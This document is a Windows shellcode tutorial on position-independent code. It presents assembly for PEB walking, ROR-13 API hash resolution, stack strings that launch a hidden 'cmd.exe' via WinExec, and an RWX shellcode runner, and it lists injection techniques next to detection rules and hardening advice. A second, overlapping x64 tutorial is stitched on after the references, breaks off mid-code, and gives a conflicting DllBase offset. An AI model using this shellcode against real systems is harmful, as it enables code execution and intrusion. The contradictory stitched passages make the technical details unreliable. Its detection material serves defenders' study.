Position-Independent Code: Writing PIC Shellcode Without Hardcoded Addresses

Objective: Understand how Windows shellcode achieves position independence — resolving module bases through the TEB/PEB chain, walking PE export tables, hashing API names, and eliminating null bytes — so defenders can detect the resulting memory and behavioral signatures and authorized red teamers can build and test payloads correctly.

1. What Makes Code Position-Dependent?

A normal Windows executable contains absolute virtual addresses everywhere: indirect calls through the Import Address Table (IAT), references to global variables, jump tables, and so on. The PE loader fixes these up at load time using the .reloc section and patches the IAT against the modules it has just mapped.

Shellcode has none of that. It is raw opcodes copied into a memory region (often allocated by VirtualAlloc or written into another process), with no loader, no relocation table, no IAT, and no guarantee about where it will live. Any hardcoded virtual address — to a string, to an API, to a jump target — will be wrong the moment the payload moves.

The constraint is therefore strict: every address the shellcode needs must be computed at runtime, from a known starting point that the OS itself hands the thread. On Windows, that starting point is the Thread Environment Block (TEB).

2. The Problem with the IAT

A standard PE binary calls LoadLibraryA via something like call qword ptr [rip+IAT_LoadLibraryA] — an indirect jump through a slot the loader populated. Shellcode cannot do this:

It has no .idata section, no IMAGE_IMPORT_DESCRIPTOR, and no loader to read them.
It cannot embed an absolute kernel32!LoadLibraryA address because ASLR randomizes module bases every boot.
It cannot rely on Windows syscall numbers either — those numbers are not a stable ABI and shift between builds.

The standard solution is PEB walking: the shellcode traces the in-memory loader data structures to find kernel32.dll, parses its export table, and resolves the handful of APIs it actually needs (typically LoadLibraryA and GetProcAddress, which then bootstrap anything else).

3. Windows Memory Layout Primer: TEB, PEB, and the Loader

Every Windows thread has a TEB. The OS keeps a pointer to it in a segment register so user-mode code can reach it in a single instruction:

Architecture	Instruction	Result
x86	`MOV EAX, FS:[0x30]`	`EAX` ← `TEB.ProcessEnvironmentBlock` (PEB)
x64	`MOV RAX, GS:[0x60]`	`RAX` ← `TEB.ProcessEnvironmentBlock` (PEB)

From the PEB, shellcode chains through Ldr (a _PEB_LDR_DATA*) to reach the loader’s three doubly-linked lists of _LDR_DATA_TABLE_ENTRY records — one entry per loaded module.

Relevant offsets (Windows 10/11):

Struct	Field	x86 offset	x64 offset
`_TEB`	`ProcessEnvironmentBlock`	`+0x030`	`+0x060`
`_PEB`	`Ldr`	`+0x00C`	`+0x018`
`_PEB_LDR_DATA`	`InLoadOrderModuleList`	`+0x00C`	`+0x010`
`_PEB_LDR_DATA`	`InMemoryOrderModuleList`	`+0x014`	`+0x020`
`_PEB_LDR_DATA`	`InInitializationOrderModuleList`	`+0x01C`	`+0x030`
`_LDR_DATA_TABLE_ENTRY`	`DllBase`	`+0x018`	`+0x030`
`_LDR_DATA_TABLE_ENTRY`	`BaseDllName`	`+0x02C`	`+0x058`

Verify offsets on your target build with WinDbg (dt ntdll!_PEB, dt ntdll!_LDR_DATA_TABLE_ENTRY). They are stable across mainstream Windows 10/11 but not guaranteed forever.

// Conceptual layout — fields used by PEB-walking shellcode
typedef struct _LDR_DATA_TABLE_ENTRY {
    LIST_ENTRY     InLoadOrderLinks;        // +0x00
    LIST_ENTRY     InMemoryOrderLinks;      // +0x10 (x64)
    LIST_ENTRY     InInitializationOrderLinks;
    PVOID          DllBase;                 // +0x30 (x64)
    PVOID          EntryPoint;
    ULONG          SizeOfImage;
    UNICODE_STRING FullDllName;
    UNICODE_STRING BaseDllName;             // +0x58 (x64)
    // ...
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;

Flowchart showing the shellcode pointer chain from TEB via PEB and PEB_LDR_DATA to the kernel32.dll DllBase field — Every PIC shellcode begins here: a single segment-register read unravels the full loader chain to kernel32’s image base.

4. Walking the Module List to Find kernel32.dll

The loader populates InInitializationOrderModuleList in a predictable order: the main executable first, then ntdll.dll, then kernel32.dll. A common shortcut is to grab the third entry’s DllBase without ever comparing a name — fewer bytes, no strings, no signatures.

; x64 — locate kernel32.dll base via the PEB
; Output: RBX = kernel32.dll base address

    xor   rcx, rcx
    mov   rax, [gs:rcx + 0x60]      ; RAX = PEB
    mov   rax, [rax + 0x18]         ; RAX = PEB->Ldr
    mov   rax, [rax + 0x20]         ; RAX = InMemoryOrderModuleList.Flink (1st: this EXE)
    mov   rax, [rax]                ; 2nd entry: ntdll.dll
    mov   rax, [rax]                ; 3rd entry: kernel32.dll
    mov   rbx, [rax + 0x20]         ; LDR_DATA_TABLE_ENTRY.DllBase
                                    ; (offset 0x20 within an InMemoryOrder-rooted entry)

For 32-bit shellcode the same idea applies with smaller offsets:

; x86 — same walk, FS-relative
    xor   ecx, ecx
    mov   eax, [fs:ecx + 0x30]      ; EAX = PEB
    mov   eax, [eax + 0x0C]         ; PEB->Ldr
    mov   eax, [eax + 0x14]         ; InMemoryOrderModuleList.Flink
    mov   eax, [eax]                ; 2nd
    mov   eax, [eax]                ; 3rd (kernel32)
    mov   ebx, [eax + 0x10]         ; DllBase (x86 offset)

A more robust variant iterates the list and hash-compares BaseDllName.Buffer (Unicode), upper-casing each character inline. That survives reordering and is what production loaders use.

5. Parsing the PE Export Directory

Once RBX = kernel32!ImageBase, the shellcode parses the PE headers:

ImageBase
  └─► IMAGE_DOS_HEADER.e_lfanew (+0x3C)
        └─► IMAGE_NT_HEADERS
              └─► OptionalHeader.DataDirectory[0]  ; EXPORT
                    └─► IMAGE_EXPORT_DIRECTORY
                          ├─ NumberOfNames
                          ├─ AddressOfNames        (RVA → name RVAs)
                          ├─ AddressOfNameOrdinals (RVA → ordinal table)
                          └─ AddressOfFunctions    (RVA → function RVAs)

The three arrays are parallel: index i in AddressOfNames matches index i in AddressOfNameOrdinals, whose ordinal value o indexes AddressOfFunctions[o]. All values are RVAs, so the resolved function address is ImageBase + RVA.

; x64 — reach the export directory from RBX = ImageBase
; Output: RCX = IMAGE_EXPORT_DIRECTORY*
    mov   eax, dword [rbx + 0x3C]   ; DOS.e_lfanew
    lea   rdx, [rbx + rax]          ; RDX -> IMAGE_NT_HEADERS
    mov   eax, dword [rdx + 0x88]   ; NT.OptionalHeader.DataDirectory[0].VirtualAddress
    lea   rcx, [rbx + rax]          ; RCX -> IMAGE_EXPORT_DIRECTORY

    mov   r8d,  dword [rcx + 0x18]  ; NumberOfNames
    mov   r9d,  dword [rcx + 0x20]  ; AddressOfNames     (RVA)
    mov   r10d, dword [rcx + 0x24]  ; AddressOfNameOrdinals
    mov   r11d, dword [rcx + 0x1C]  ; AddressOfFunctions

The resolver then iterates 0..NumberOfNames-1, hashes the name string at ImageBase + Names[i], compares against a precomputed target, and on match returns ImageBase + Functions[ Ordinals[i] ].

Flowchart illustrating the three parallel export table arrays — AddressOfNames, AddressOfNameOrdinals, AddressOfFunctions — and how they combine to resolve a Windows API address at runtime — The export directory’s three parallel arrays form a two-step indirection: name index maps to ordinal, ordinal maps to function RVA.

6. Function Name Hashing (ROR-13)

Embedding the literal string "LoadLibraryA" would (a) introduce hardcoded data references and (b) be a trivial AV signature. The standard substitute is an inline rolling hash. The most common is ROR-13 add:

// Conceptual ROR-13 hash. Iterate bytes of the export name; stop at NUL.
// Same routine is implemented inline in assembly when resolving APIs.
unsigned int ror13_hash(const char *name) {
    unsigned int h = 0;
    while (*name) {
        h = (h >> 13) | (h << (32 - 13));   // ROR 13
        h += (unsigned char)*name++;
    }
    return h;
}

// Pre-computed constants (illustrative — recompute for your toolchain):
// LoadLibraryA   -> 0x0726774C
// GetProcAddress -> 0x7C0DFCAA
// ExitProcess    -> 0x73E2D87E
// VirtualAlloc   -> 0x91AFCA54

Replacing the while body with three cmp/ror/add instructions inside the export-walk loop produces a few dozen bytes of fully position-independent resolver — no strings, no absolute addresses, no relocations.

7. RIP-Relative Addressing and the CALL/POP Trick

When the shellcode does need inline data (a precomputed key, a config blob, a wide-string template), it must reference it without an absolute address.

x64 makes this nearly free: every LEA reg, [rel label] and direct CALL/JMP is encoded RIP-relative:

    lea   rcx, [rel api_hash_table]   ; RIP-relative, no relocation needed

x86 has no RIP-relative encoding. The classic substitute is the get-EIP trick: CALL past a label, then POP the return address into a register, giving you a known anchor:

    call  get_eip
get_eip:
    pop   ebp                          ; EBP = address of this instruction
    ; data referenced as [ebp + (label - get_eip)]

Anything stored inline can now be addressed by displacement from EBP.

8. Stack Strings and Null-Byte Elimination

Shellcode is often delivered via a string-copying primitive (strcpy, lstrcpyA, a parser that stops at \0), so embedded null bytes truncate the payload. Two problems must be solved together: avoid nulls in opcodes, and produce required strings ("kernel32.dll", "WinExec", "cmd.exe") without storing them as data.

Construct strings on the stack by pushing immediates:

; Build "cmd.exe\0" on the stack (8 bytes including NUL)
    xor   rax, rax
    push  rax                       ; trailing NUL via zeroed qword
    mov   rax, 0x6578652E646D63     ; 'cmd.exe' (little-endian, no embedded zero)
    push  rax
    mov   rcx, rsp                  ; RCX -> "cmd.exe\0" — first arg for WinExec

Eliminate accidental nulls in opcodes:

Avoid	Use instead	Reason
`mov rax, 0` (`48 C7 C0 00 00 00 00`)	`xor rax, rax`	Removes four NUL bytes
`push 0` (`6A 00`)	`xor reg, reg; push reg`	`6A 00` contains a NUL
Short jumps spanning NUL displacements	Pad with `nop` or reorder code	Avoids NUL in the offset byte
`mov al, 0x00`	`xor al, al`	Same fix at byte width

Always disassemble and grep the assembled output for \x00 before shipping — see Section 10.

9. x64 ABI Constraints: Shadow Space and Alignment

Windows x64 imposes two rules shellcode authors get wrong constantly:

RSP must be 16-byte aligned at the point of CALL to any Windows API. The CALL itself pushes an 8-byte return address, so the callee’s RSP ends up at (16N - 8) on entry, which is what Microsoft’s prolog code expects.
The caller allocates 32 bytes of shadow space (a.k.a. home space) above the return address, even when the callee takes 0–4 arguments. The callee may spill RCX, RDX, R8, R9 into those slots.

The first four integer arguments go in RCX, RDX, R8, R9; further arguments are pushed right-to-left. Volatile registers (RAX, RCX, RDX, R8–R11) may be clobbered by any CALL; non-volatile (RBX, RBP, RDI, RSI, R12–R15) must be saved if you rely on them.

; Calling WinExec("cmd.exe", SW_HIDE) once API is resolved in RAX
    and   rsp, -16                  ; force 16-byte alignment
    sub   rsp, 32                   ; shadow space (home space)

    lea   rcx, [rsp + 0x40]         ; pointer to "cmd.exe" (built earlier)
    xor   rdx, rdx                  ; uCmdShow = SW_HIDE (0)
    call  rax                       ; WinExec

    add   rsp, 32                   ; tear down shadow space

Misalignment typically manifests as STATUS_ACCESS_VIOLATION inside kernel32 or ntdll MMX/SSE prologs — a tell-tale crash signature when reviewing payloads.

10. Extraction and Controlled Testing

Once assembled with NASM, raw bytes are extracted from the COFF object and audited:

nasm -f win64 payload.asm -o payload.obj
objcopy -O binary -j .text payload.obj payload.bin

A quick Python harness verifies the payload is truly position-independent — no embedded nulls, no relocations:

# verify.py — sanity-check a raw shellcode blob
data = open("payload.bin", "rb").read()
print(f"[+] size: {len(data)} bytes")

null_offsets = [i for i, b in enumerate(data) if b == 0]
if null_offsets:
    print(f"[!] {len(null_offsets)} NUL byte(s), first at offset {null_offsets[0]:#x}")
else:
    print("[+] null-free")

# C-array dump for embedding in a test loader
print("unsigned char sc[] = {")
print(", ".join(f"0x{b:02x}" for b in data))
print("};")

A minimal local loader executes the payload inside the same process for isolated VM testing — this is the educational sandbox, not a cross-process injector:

// test_runner.cpp — local-only execution for analysis in a VM
// Defenders: this RWX + function-pointer-cast pattern is exactly what
// EDR/ETW THREATINT flags. It is shown so you know what to look for.
#include <windows.h>
#include <string.h>
extern unsigned char sc[];
extern size_t        sc_len;

int main(void) {
    void *mem = VirtualAlloc(NULL, sc_len,
                             MEM_COMMIT | MEM_RESERVE,
                             PAGE_EXECUTE_READWRITE);
    memcpy(mem, sc, sc_len);
    ((void(*)())mem)();
    return 0;
}

The VirtualAlloc(PAGE_EXECUTE_READWRITE) → memcpy → indirect-call triad is the canonical shellcode runner pattern and is heavily instrumented.

11. Common Attacker Techniques

Technique	Description
PEB walking	Resolve `kernel32`/`ntdll` bases via `GS:[0x60]` / `FS:[0x30]` without imports
Export hash resolution	ROR-13 (or FNV/djb2) hashing to find APIs without embedded strings
Stack strings	Push immediates to materialise `"cmd.exe"`, `"WinExec"`, etc., on the stack
Reflective loading	PIC stub maps a full DLL into memory and calls its `DllMain` (T1620)
Remote injection	`VirtualAllocEx` + `WriteProcessMemory` + `CreateRemoteThread` into a target PID
APC queuing	`QueueUserAPC` to deliver shellcode into an alertable thread
Process hollowing	Suspend a benign process, unmap its image, write PIC payload, resume
Module stomping	Overwrite the `.text` of a legitimately loaded DLL with PIC shellcode

12. Defensive Strategies & Detection

PIC shellcode leaves consistent telemetry across Sysmon, ETW, and memory forensics.

Sysmon Event IDs to monitor:

Event ID	Signal
`1`	Process creation (with command line) — anomalous parents (`winword.exe` → `cmd.exe`)
`7`	`ImageLoad` from user-writable paths into system processes
`8`	`CreateRemoteThread` — primary remote-injection signal
`10`	`ProcessAccess` with `GrantedAccess` containing `0x1F0FFF`, `0x1410`, or `PROCESS_VM_WRITE \\| PROCESS_VM_OPERATION \\| PROCESS_CREATE_THREAD`
`17`/`18`	Named pipe creation/connection (common C2 channel)
`25`	`ProcessTampering` (image hollowing)

ETW providers give earlier and harder-to-evade signal: Microsoft-Windows-Threat-Intelligence (THREATINT) fires on VirtualAllocEx with PAGE_EXECUTE_READWRITE, WriteProcessMemory, and MapViewOfFile against remote processes. Consuming THREATINT requires a signed ELAM/PPL driver, which is why EDR vendors — not generic SIEMs — own this telemetry. Also enable the Audit Process Creation policy (Event ID 4688) with command-line inclusion, and Audit Kernel Object to capture OpenProcess handle requests.

Sigma sketch — cross-process handle access for injection:

title: Suspicious Cross-Process Access Likely Preceding Shellcode Injection
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 10
    GrantedAccess|contains:
      - '0x1F0FFF'    # PROCESS_ALL_ACCESS
      - '0x1410'      # VM_READ|VM_WRITE|VM_OPERATION
      - '0x1F1FFF'
    TargetImage|endswith:
      - '\lsass.exe'
      - '\svchost.exe'
      - '\explorer.exe'
  filter_legit:
    SourceImage|endswith:
      - '\MsMpEng.exe'
      - '\MsSense.exe'
  condition: selection and not filter_legit
level: high

Memory-forensics indicators: Volatility 3 malfind locates RWX regions containing executable code or PE headers in non-image memory; ldrmodules flags executable regions not represented in any of the three PEB loader lists — the canonical reflective/PIC signature. Threads whose StartAddress falls inside a heap allocation rather than a mapped image are inherently suspicious.

Hardening:

Mitigation	Effect
ACG (`ProcessDynamicCodePolicy`)	Forbids new executable pages; breaks `VirtualAlloc(PAGE_EXECUTE_READWRITE)`
DEP / NX	Hardware-enforced non-execute on data pages
CFG	Invalidates indirect calls to non-registered targets
HVCI	Hypervisor-enforced kernel code integrity
ASR rules	Block office/script children, untrusted USB execution, etc.
Restrict `SeDebugPrivilege`	Limits which accounts can open and write to other processes

Hierarchy diagram showing four defensive detection layers against PIC shellcode: ETW THREATINT telemetry, Sysmon event IDs, Volatility memory forensics, and OS hardening mitigations — Layered detection combines kernel-level ETW telemetry, Sysmon behavioral events, and offline memory analysis to catch shellcode across its full lifecycle.

13. Tools for PIC Shellcode Analysis

Tool	Description	Link
WinDbg	Verify struct offsets (`dt ntdll!_PEB`, `dt ntdll!_LDR_DATA_TABLE_ENTRY`)	microsoft.com
NASM	Assemble x86/x64 PIC payloads in Intel syntax	nasm.us
x64dbg	Dynamic analysis of shellcode in a loader harness	x64dbg.com
Ghidra / IDA	Static disassembly of extracted opcodes	ghidra-sre.org
Process Hacker	Inspect process memory regions and protections	processhacker.sf.io
`pe-sieve`	Hunts injected, hollowed, or stomped modules	github.com/hasherezade/pe-sieve
Volatility 3	`malfind`, `ldrmodules`, `vadinfo` for memory-resident PIC	volatilityfoundation.org
YARA	Signature ROR-13 loops, PEB-walk prologues, hash tables	virustotal.github.io/yara
SilkETW	Subscribe to THREATINT and Kernel-Process providers	github.com/mandiant/SilkETW

14. MITRE ATT&CK Mapping

Technique	MITRE ID	Detection
Reflective Code Loading	`T1620`	Volatility `malfind` / `ldrmodules`; THREATINT ETW
Process Injection (parent)	`T1055`	Sysmon EID `10` + EID `8`; ETW THREATINT WriteVM/AllocVM
Process Injection: DLL	`T1055.001`	Sysmon EID `7` from unusual paths; `pe-sieve`
Process Injection: APC	`T1055.004`	Kernel-Process ETW thread events on alertable waits
Process Injection: Hollowing	`T1055.012`	Sysmon EID `25` ProcessTampering; `pe-sieve` hollowing scan
Obfuscated Files or Information	`T1027`	YARA on ROR-13 hash loops and stack-string push sequences
Command and Scripting Interpreter	`T1059`	EID `4688` / Sysmon EID `1` with command-line auditing

Summary

Position-independent shellcode replaces the PE loader’s work at runtime: it must resolve every address it touches, starting from the segment-register pointer to the TEB.
The PEB → Ldr → InMemoryOrderModuleList chain reaches kernel32.dll in three pointer dereferences without any string comparison.
Parsing the PE export directory with ROR-13 hashed lookups removes embedded API name strings and the static signatures they create.
Stack-string construction, XOR-zero idioms, and RIP-relative addressing keep the byte stream null-free and relocation-free.
Defenders catch the resulting behaviour through Sysmon EID 8/10, THREATINT ETW on VirtualAllocEx/WriteProcessMemory, and Volatility malfind/ldrmodules against unbacked RWX regions — and harden processes with ACG, CFG, HVCI, and ASR rules to break the primitive entirely.

References

Writing x64 Shellcode: Differences, Shadow Space, and Register Conventions

Objective: Understand the architectural and ABI-level differences between x86 and x64 Windows shellcode, including the Microsoft x64 calling convention, shadow space, stack alignment, position-independent API resolution via PEB walking, and the detection surface each technique exposes.

1. From x86 to x64: What Actually Changed

Moving shellcode from x86 to x64 Windows is not a syntactic exercise of renaming EAX to RAX. The ABI changed, the segment register that anchors the TEB changed, and the addressing model changed. A snippet that “looks right” can execute cleanly, corrupt the host process, and crash three calls later inside an SSE instruction — none of which gives the author an obvious clue.

Item	x86	x64
General-purpose registers	8 × 32-bit (`EAX`…`EDI`)	16 × 64-bit (`RAX`…`R15`)
Windows calling convention	`stdcall` / `cdecl` — all args on stack	Unified fast-call — first 4 integer args in registers
TEB segment register	`FS`; PEB at `fs:[0x30]`	`GS`; PEB at `gs:[0x60]`
Address width	32-bit	64-bit (48-bit canonical VA in practice)
`call` pushes	4-byte return address	8-byte return address
RIP-relative addressing	Not available	Available; `lea rax, [rip + offset]` is idiomatic in PIC

Two consequences dominate the rest of this tutorial. First, x64 adopts a single __fastcall-style ABI with a mandatory shadow space and 16-byte stack alignment rule. Second, the TEB is reached via GS, not FS, and every PEB offset must be updated for the 64-bit struct layout.

2. The Microsoft x64 ABI Deep-Dive

The Microsoft x64 calling convention passes the first four integer arguments in registers and floating-point arguments in the low halves of the first four XMM registers. Anything beyond that goes on the stack, above the shadow space, pushed right-to-left.

Argument #	Integer Register	Floating-Point Register
1st	`RCX`	`XMM0L`
2nd	`RDX`	`XMM1L`
3rd	`R8`	`XMM2L`
4th	`R9`	`XMM3L`
5th+	Stack (above shadow space)	Stack

The return value lives in RAX for integers and pointers, and in XMM0 for floating-point results.

Volatile vs Non-Volatile Registers

Class	Registers
Volatile	`RAX`, `RCX`, `RDX`, `R8`, `R9`, `R10`, `R11`, `XMM0`–`XMM5`
Non-volatile	`RBX`, `RBP`, `RDI`, `RSI`, `RSP`, `R12`, `R13`, `R14`, `R15`, `XMM6`–`XMM15`

A callee may freely destroy volatile registers; non-volatile registers must be preserved across calls. Shellcode that clobbers RBX or RDI in the host thread and then returns control corrupts the host. This is the single most common reason “working” shellcode crashes the host process several instructions after the shellcode finishes.

Side-by-Side: x86 Push vs x64 Register Load

; --- x86 stdcall: MessageBoxA(0, "msg", "title", 0) ---
push 0              ; uType
push title          ; lpCaption
push msg            ; lpText
push 0              ; hWnd
call [MessageBoxA]  ; callee cleans the stack

; --- x64 fastcall: same call ---
xor  rcx, rcx                       ; hWnd      = NULL
lea  rdx, [rel msg]                 ; lpText
lea  r8,  [rel title]               ; lpCaption
xor  r9d, r9d                       ; uType     = 0
sub  rsp, 0x28                      ; shadow space + alignment (see §4)
call [rel MessageBoxA]
add  rsp, 0x28

Note xor r9d, r9d rather than xor r9, r9 — writing to the 32-bit sub-register zero-extends to the full 64-bit register and produces a shorter, null-byte-free opcode.

Diagram showing the Microsoft x64 calling convention: arguments flow through RCX, RDX, R8, R9, then onto the stack, with the return value in RAX. — The Microsoft x64 ABI passes the first four integer arguments in registers; additional arguments land on the stack above shadow space.

3. Shadow Space: Why, What, and Where

In the Microsoft x64 convention the caller must reserve 32 bytes (4 × 8) of stack immediately above the return address as shadow space (also called home space or spill space). This area exists so the callee has somewhere to spill RCX, RDX, R8, and R9 back to memory if it needs to take their addresses or free up the registers for re-use.

Critical points:

Shadow space is always reserved, even when the callee takes fewer than four arguments and even when the callee never spills.
It is owned by the caller. The callee may overwrite it without saving the previous contents.
The caller does not zero or initialise it. The callee is responsible for whatever it writes there.
Stack arguments beyond the fourth begin at [RSP + 0x28] (32 bytes shadow + 8 bytes return address).

Layout immediately after `call`, before callee prologue	Offset from `RSP`
Return address (pushed by `call`)	`[RSP + 0x00]`
Shadow slot for `RCX`	`[RSP + 0x08]`
Shadow slot for `RDX`	`[RSP + 0x10]`
Shadow slot for `R8`	`[RSP + 0x18]`
Shadow slot for `R9`	`[RSP + 0x20]`
5th argument (if any)	`[RSP + 0x28]`

Skip the shadow allocation and the first thing the callee does — often a mov [rsp+8], rcx early in a Win32 prologue — clobbers your own stack frame or, worse, the saved return address you just pushed.

Stack layout diagram showing the mandatory 32-byte shadow space between the return address and stack arguments in the Microsoft x64 calling convention. — The caller must always reserve 32 bytes of shadow space directly above the return address, with additional stack arguments starting at RSP+0x28.

4. Stack Alignment in Practice

The Microsoft x64 ABI requires RSP to be 16-byte aligned at the moment of a call, except inside a prolog. The hardware call then pushes an 8-byte return address, so on entry to the callee RSP is 16N + 8 aligned. Win32 internals (memcpy, CRT, anything that uses SSE/AVX with aligned moves) will issue movaps / movdqa against stack locations and will raise EXCEPTION_ACCESS_VIOLATION (0xC0000005) if RSP is wrong by 8.

This is why the canonical shellcode prologue is sub rsp, 0x28, not 0x20:

0x20 (32 bytes) for shadow space.
+ 0x08 to undo the misalignment the preceding call introduced.

; Canonical shellcode call wrapper
sub rsp, 0x28          ; 32B shadow + 8B realign
call rax               ; rax = resolved API address
add rsp, 0x28

When the shellcode entry itself was reached by a jump from unknown context, force alignment explicitly:

; Defensive entry: align RSP regardless of caller state
and rsp, 0xFFFFFFFFFFFFFFF0   ; force 16-byte alignment
sub rsp, 0x28                  ; shadow + 8 to keep call-time alignment

To diagnose alignment faults in WinDbg, dump the faulting instruction (u .) and check whether it is a movaps / movdqa referencing [rsp+…]. If rsp & 0xF == 0x8 at the call, you forgot the + 0x08.

5. Position-Independent Code Fundamentals

Shellcode does not know where it will land. Hard-coded addresses are forbidden — ASLR randomises module bases per boot, and the shellcode itself is dropped at an allocator-chosen address. Two x64 idioms enable position independence:

RIP-relative addressing. lea rax, [rel label] resolves to lea rax, [rip + disp32] and produces correct results regardless of load address. This is the preferred way to reference embedded data in x64 shellcode.
call/pop delta trick. A call to the next instruction pushes its return address — the runtime location of the following label. The callee pops it into a register to obtain a base for subsequent offsets.

; Obtain the runtime address of `data` without RIP-relative encoding
    call get_rip
get_rip:
    pop rbx                  ; rbx = address of next instruction
    lea rsi, [rbx + data - get_rip]
    jmp continue
data:
    db "kernel32.dll", 0
continue:

In practice, prefer lea reg, [rel label] for clarity; reach for call/pop only when an encoder demands it (for example, to avoid certain bad bytes).

6. PEB Walking: Finding kernel32.dll Without Imports

Because shellcode has no import table, it must walk the loader’s in-memory bookkeeping to find kernel32.dll and then resolve GetProcAddress / LoadLibraryA from its exports. On x64 Windows the chain starts at GS and uses these offsets:

Step	Source	Field	Offset (x64)
1	`GS` segment	→ `TEB`	—
2	`TEB`	`ProcessEnvironmentBlock`	`+0x060`
3	`PEB`	`Ldr` → `PEB_LDR_DATA`	`+0x018`
4	`PEB_LDR_DATA`	`InMemoryOrderModuleList`	`+0x020`
5	`LDR_DATA_TABLE_ENTRY` link	`InMemoryOrderLinks.Flink`	`+0x000`
6	`LDR_DATA_TABLE_ENTRY`	`DllBase` (from `InMemoryOrderLinks`)	`+0x030`

The InMemoryOrderModuleList on a normal process begins with the executable, then ntdll.dll, then kernel32.dll. Walking two Flinks from the head reaches the kernel32.dll entry. Production-grade shellcode hashes the BaseDllName string rather than trusting that order, both for resilience and because EDRs deliberately permute the head of the list as a tripwire (see §10).

; --- PEB walk skeleton: locate kernel32.dll base in rax ---
    xor   eax, eax
    mov   rbx, [gs:0x60]        ; TEB -> PEB
    mov   rbx, [rbx + 0x18]     ; PEB -> Ldr (PEB_LDR_DATA)
    mov   rbx, [rbx + 0x20]     ; -> InMemoryOrderModuleList.Flink
                                ;    (points into 1st LDR_DATA_TABLE_ENTRY's InMemoryOrderLinks)
    mov   rbx, [rbx]            ; advance: -> 2nd entry (ntdll)
    mov   rbx, [rbx]            ; advance: -> 3rd entry (kernel32)
    mov   rax, [rbx + 0x30]     ; DllBase relative to InMemoryOrderLinks (x64)
                                ; rax now holds kernel32.dll base address

To verify the offsets against the target OS build, drop into WinDbg on a live process and dump the structures directly:

0:000> dt nt!_TEB ProcessEnvironmentBlock
0:000> dt nt!_PEB Ldr
0:000> dt nt!_PEB_LDR_DATA InMemoryOrderModuleList
0:000> dt nt!_LDR_DATA_TABLE_ENTRY DllBase BaseDllName
0:000> !lmi kernel32

Flow diagram tracing the PEB walk from GS register through PEB_LDR_DATA and InMemoryOrderModuleList to locate kernel32.dll base address. — Shellcode reaches kernel32.dll by following two Flink pointers from the InMemoryOrderModuleList head anchored at GS:[0x60].

7. Parsing the Export Address Table

With kernel32.dll‘s base in hand, the shellcode walks the PE headers to the Export Directory and then iterates AddressOfNames, comparing each name against a precomputed hash. String literals like "GetProcAddress" are avoided to defeat trivial signatures and to remove embedded nulls.

Key offsets from a loaded module base:

Field	Offset
`e_lfanew` (RVA of PE header)	`DllBase + 0x3C`
Optional Header	`PE_header + 0x18`
Export Directory RVA (PE32+)	`OptHeader + 0x70`
`AddressOfFunctions`	`ExportDir + 0x1C`
`AddressOfNames`	`ExportDir + 0x20`
`AddressOfNameOrdinals`	`ExportDir + 0x24`

; --- EAT walk outline: resolve an export by ROR-13 name hash ---
; in : rax = module base, ebp = target hash (e.g. for "GetProcAddress")
; out: rax = exported function address (or 0)

    mov   ecx, [rax + 0x3C]      ; e_lfanew
    add   rcx, rax               ; rcx = PE header
    mov   edx, [rcx + 0x88]      ; Export Directory RVA (OptHdr + 0x70)
    add   rdx, rax               ; rdx = IMAGE_EXPORT_DIRECTORY
    mov   r8d,  [rdx + 0x18]     ; NumberOfNames
    mov   r9d,  [rdx + 0x20]     ; AddressOfNames RVA
    add   r9, rax
    xor   r10, r10               ; index

.next_name:
    mov   esi, [r9 + r10*4]      ; name RVA
    add   rsi, rax               ; rsi -> ASCII export name
    xor   edi, edi               ; hash accumulator

.hash_byte:
    movzx eax, byte [rsi]
    test  al, al
    jz    .check
    ror   edi, 13
    add   edi, eax
    inc   rsi
    jmp   .hash_byte

.check:
    cmp   edi, ebp               ; compare ROR-13 hash
    je    .found
    inc   r10
    cmp   r10d, r8d
    jb    .next_name
    xor   rax, rax               ; not found
    ret
.found:
    ; resolve via AddressOfNameOrdinals + AddressOfFunctions
    ; (omitted for brevity)
    ret

The ROR-13 rotate-and-add hash, popularised by the Metasploit block_api stub, is the de facto standard precisely because defenders now key on it (see §10).

8. Null-Byte and Bad-Character Avoidance

Shellcode delivered through a string-copy primitive (strcpy, lstrcatA, format-string echo) is truncated at the first null byte. x64 immediates routinely embed nulls because most useful constants and addresses do not occupy all 64 bits.

Problem	Fix
`mov rax, 0x000000007FFE1234` → nulls	`xor eax, eax` then `mov eax, 0x7FFE1234` (zero-extends)
64-bit literal in `mov r9, imm64`	`lea r9, [rel label]` or build via shifts/ORs
`push 0` → encodes `6A 00`	`xor rcx, rcx` ; `push rcx`
`mov rcx, 0` → 7-byte null run	`xor ecx, ecx`

; --- Null-byte comparison ---
; BAD: mov rax, 0x76ab1234
;   48 B8 34 12 AB 76 00 00 00 00   <-- four null bytes
mov rax, 0x76ab1234

; GOOD: zero-extend via 32-bit sub-register
;   31 C0                            <-- xor eax, eax
;   B8 34 12 AB 76                   <-- mov eax, 0x76AB1234
xor eax, eax
mov eax, 0x76ab1234

Writing to EAX implicitly zeroes the upper 32 bits of RAX — this single architectural quirk eliminates most accidental nulls in shellcode constants.

A short Python lab to validate a candidate snippet:

from keystone import Ks, KS_ARCH_X86, KS_MODE_64

asm = b"""
    xor eax, eax
    mov eax, 0x76ab1234
    mov rbx, qword ptr gs:[0x60]
    mov rbx, qword ptr [rbx + 0x18]
"""
ks = Ks(KS_ARCH_X86, KS_MODE_64)
code, _ = ks.asm(asm)
buf = bytes(code)
print(buf.hex())
bad = [i for i, b in enumerate(buf) if b == 0x00]
print(f"length={len(buf)} bad_byte_offsets={bad}")

Run it, see exactly where nulls (or any other bad character) land, and rewrite the offending instruction.

9. Shellcode Skeleton: Putting It Together

The pieces combine into a recognisable x64 stub: align the stack, walk the PEB to find kernel32.dll, parse the EAT to resolve GetProcAddress and LoadLibraryA, and then call out through the standard ABI with proper shadow space.

[BITS 64]
_start:
    ; --- entry: defensively align stack ---
    and   rsp, 0xFFFFFFFFFFFFFFF0
    sub   rsp, 0x28                ; shadow space + alignment

    ; --- locate kernel32.dll via PEB ---
    mov   rbx, [gs:0x60]           ; TEB -> PEB
    mov   rbx, [rbx + 0x18]        ; PEB -> Ldr
    mov   rbx, [rbx + 0x20]        ; InMemoryOrderModuleList.Flink
    mov   rbx, [rbx]               ; -> ntdll entry
    mov   rbx, [rbx]               ; -> kernel32 entry
    mov   r15, [rbx + 0x30]        ; r15 = kernel32 base

    ; --- resolve GetProcAddress via ROR-13 hash (call into eat_lookup) ---
    mov   rcx, r15
    mov   edx, 0x7C0DFCAA          ; ROR-13("GetProcAddress")  (illustrative)
    call  eat_lookup               ; rax = &GetProcAddress
